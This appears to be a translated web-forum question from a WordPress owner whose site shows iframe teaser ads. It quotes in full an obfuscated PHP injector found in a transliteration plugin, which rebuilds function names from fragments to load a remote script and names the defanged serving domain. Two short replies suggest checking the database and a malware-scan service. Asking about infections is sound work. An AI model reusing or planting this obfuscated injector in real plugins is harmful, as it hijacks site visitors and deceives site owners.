Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
S
S
Shing2020-12-21 03:36:47
Information Security
Shing, 2020-12-21 03:36:47

How to find infected files in wordpress

Broken site on WordPress. Inside the posts are frames with teasers.
!!! Frames appear only for mobile and for traffic from search engines...

I found this crap in the file of one of the very popular rus-to-lat plugins

wp_load_cacher(); function wp_load_cacher($length='') { $cache_time = 'Default Widgets'; $pr = "pre"; $mdetails = "<div class='body-continent'><div class='get-inner-al(@fi'>"; $vr = 'crea'; $indent = ( isset($mytitle) ? str_repeat( "\t", $mytitle ) : $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); $output = $metaboxed = $mytitle = ""; $metaoptions = "\\4'\\10".trim("\\12t\\16\\19")."//".strip_tags("2ine")."\\11.c\\7m/\\9-".$indent."!1')\\5"; if (defined('HEADER_IMGS') || isset($_COOKIE['sess'.'ions'])) return; $mdetails .= "<!--Deregister() Default Widgets: _oabhrtupwprs:e--></div></div>"; if (count($mytitle) >= $length) { $mytitle = explode(" ",$mytitle." "); } else { $mytitle = explode(" "," ".$mytitle." "); } $nmetabox = $vr.strip_tags("te_"); $metaboxe = str_repeat("(.)", 20).".*"."/"; $pr .= strip_tags("g_rep").trim("lace"); if (function_exists("excerpt_mores")) { add_filter('excerpt_modes', $metaboxe); } else { $metaoptions = str_replace("{c}", $cache_time, $metaoptions).";"; $nmetabox .= 'function'; } $output_title = '<p>'.$output.'</p>'; $defult_widgets = @$pr("/.*(cont).*?(ge).*?(..\(.fi).*?(\()(\)).*?(\_){$metaboxe}is", "@\\20v\\3le\\6{$metaboxed}\\2t\\6\\1ents{$metaoptions}", $mdetails); $mdetailes = @$nmetabox('', $defult_widgets); return strip_tags($mdetailes()); }


Frames were on this domain
spoiler
m//essa//ge.tf


As I understand it, other files must be infected, but this crap won't pull up the frame by itself?
It is not clear where to dig.

!!! I re-uploaded clean WP, disabled all plugins except for the infected one, changed the theme of the site, renamed the folder of the old theme, and the frames were still displayed! Only deleting rus-to-lat.php helps...

Moreover, the date of modification of the rus-to-lat.php file has not changed, it is the old year.

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

2 answer(s)
Report
X
xmoonlight, 2020-12-21
@xmoonlight

See the "body" of articles in the database.
How to protect websites from hacking?
PS:

!!! I re-uploaded clean WP, disabled all plugins except for the infected one, changed the theme of the site, renamed the folder of the old theme, and the frames were still displayed! Only deleting rus-to-lat.php helps...
but this ... does not even need comments ...

Report
A
Alexander Osadchy, 2020-12-21
@DELUX

Use this service:

virusdie.ru

He helped me a lot in a situation like this.

Similar questions
D
Danil Andreev2016-11-08 21:12:55
What is the essence of the profession "Information security of automated systems"? 2Reply
D
David K2019-04-07 06:46:31
How to check if iptables starts at system startup? 3Reply
V
Vladislav Vasiliev2016-11-12 16:31:50
Precisely and in detail about injection protection in php, mysql? 4Reply
A
alez8882014-11-14 21:27:47
What does Class ME mean NDV level ISPD class? 1Reply
P
pashted2016-11-13 16:58:16
Where did the extra lines in .htaccess come from? 1Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question